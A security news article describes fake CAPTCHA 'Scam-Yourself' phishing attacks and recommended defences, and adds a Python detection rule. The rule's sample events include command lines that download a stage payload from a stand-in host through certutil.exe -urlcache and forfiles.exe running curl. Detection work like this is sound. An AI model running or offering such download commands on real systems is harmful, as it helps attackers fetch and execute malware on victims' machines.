Increased prevalence of CAPTCHA deceit in late 2024: Recognizing the signs
In recent months, a new social engineering attack known as "Scam-Yourself" has surged, utilising fake CAPTCHA pages to trick victims into compromising their own credentials. This emerging phishing tactic, which has been gaining traction since Q3 2024, exploits user trust in verification processes and poses significant risks to organisations.
According to security researchers, the technique presents a seemingly legitimate verification step, often disguised as a CAPTCHA. That extra step adds a layer of deception, making the fraudulent page appear trustworthy enough that the victim willingly provides sensitive information.
One notable example is the EvilProxy phishing kit's use of fake verification pages, including CAPTCHA-style "prove you are not a bot" screens, to lull victims into a false sense of security before redirecting them to fraudulent login pages designed to steal credentials, particularly Microsoft 365 logins.
The potential risks for organisations are numerous. Credential theft and account compromise are at the forefront, as these attacks enable attackers to harvest login credentials that can then be used to breach organisational systems, leading to data leaks, ransomware deployment, or further internal compromise.
Moreover, the use of CAPTCHA or bot verification pages increases the likelihood of victims completing the scam, thereby increasing infection rates in phishing campaigns. This, in turn, presents additional risks, such as supply chain and third-party risks, as seen with the spoofing of platforms like Upwork, which can indirectly jeopardise organisational security if those external parties have network access or sensitive information.
As the attacks grow in volume and complexity, threat actors are expected to leverage AI to create more realistic fake pages and communications, making detection even harder. Attackers may also integrate multi-step deception tactics combining phishing, CAPTCHA-faking, and even voice or video manipulation to further trick targets and bypass multi-factor authentication or security training.
To counteract these threats, organisations are advised to update their security awareness programs and technical defences. ReliaQuest has predicted that attackers may also start using alternative execution methods, such as forfiles.exe or certutil.exe, to download the initial stage of the attack, aiming to circumvent existing detection measures.
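The prediction above, that the initial stage may be fetched through built-in Windows utilities such as certutil.exe or forfiles.exe, is something a detection engineer can turn into a process-creation rule. The following is an added example, not code from the article or from ReliaQuest: it runs a small classifier over constructed Sysmon Event ID 1-style records (parent image, image, command line) and flags certutil.exe invoked with its `-urlcache` option against a URL, or forfiles.exe used with `/c` to run a command that contains a URL. It raises the severity when the parent process is a web browser, since the fake CAPTCHA lure is delivered through the browser. The event field names, the sample command lines and the `example.invalid` URLs are constructed for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1-style fields).
# These are illustrative records, not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://example.invalid/stage1.bin C:\Users\Public\s1.bin"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles.exe /p C:\Windows\System32 /m notepad.exe /c "cmd /c curl http://example.invalid/s1 -o C:\Users\Public\s1.bin"'},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\temp\cert.cer"},   # benign certutil use, no URL
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
FORFILES_C_RE = re.compile(r"\s/c\s", re.IGNORECASE)
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "brave.exe")


def _basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a finding dict for a suspicious LOLBin download pattern, or None."""
    image = _basename(event["image"])
    parent = _basename(event["parent"])
    cmd = event["cmdline"]
    cmd_lower = cmd.lower()
    urls = URL_RE.findall(cmd)

    reason = None
    # certutil -urlcache (or /urlcache) with a URL is the documented way to fetch a remote file.
    if image == "certutil.exe" and ("-urlcache" in cmd_lower or "/urlcache" in cmd_lower) and urls:
        reason = "certutil.exe used to fetch a remote file"
    # forfiles /c runs an arbitrary command per matched file; a URL inside it means a download.
    elif image == "forfiles.exe" and FORFILES_C_RE.search(cmd) and urls:
        reason = "forfiles.exe used as a proxy to run a command that fetches a remote file"

    if reason is None:
        return None

    # A browser parent matches the fake-CAPTCHA delivery path, so escalate.
    severity = "high" if parent in BROWSERS else "medium"
    return {"image": image, "parent": parent, "urls": urls,
            "reason": reason, "severity": severity}


def scan(events):
    """Run classify() over a list of events and return only the findings."""
    return [f for f in (classify(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['image']} (parent {finding['parent']}): "
              f"{finding['reason']} -> {', '.join(finding['urls'])}")
```

The URL requirement keeps the rule from firing on routine administrative uses of certutil (certificate verification, hash calculation) and of forfiles (local file housekeeping); in production the same logic would sit in a SIEM query over real process-creation telemetry, with the browser-parent escalation tuned to the browsers actually deployed.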
In a recent investigation by Ukraine's national cyber defence team, APT28 (Fancy Bear), with ties to the Russian military, was found to have used fake CAPTCHA pages to infiltrate local governments. Meanwhile, Gen Digital reported protecting over 2 million users from the fake CAPTCHA variant of these attacks in the same period.
In summary, the "Scam-Yourself" attack using fake CAPTCHA pages is an emerging, sophisticated phishing tactic that exploits user trust in verification processes to steal credentials. Its rise poses significant risks to organisations through increased credential theft and potential broader compromise, with an ongoing trend of increasing sophistication driven by AI and advanced social engineering techniques. Organisations that do not update their security awareness programs and technical defences may face increased breaches initiated by these "Scam-Yourself" style attacks.
Cybersecurity professionals are warning about the increasing use of fake CAPTCHA pages in phishing attacks, such as the EvilProxy phishing kit, which trick victims into providing sensitive information. This cybersecurity threat, referred to as "Scam-Yourself", poses significant risks to organisations, particularly due to the theft of credentials and potential account compromises.
To counteract these attacks and protect against credential theft and account breaches, organisations must update their security awareness programs and technical defences, as ongoing trends suggest that these attacks may integrate AI, multi-step deception tactics, and alternative execution methods.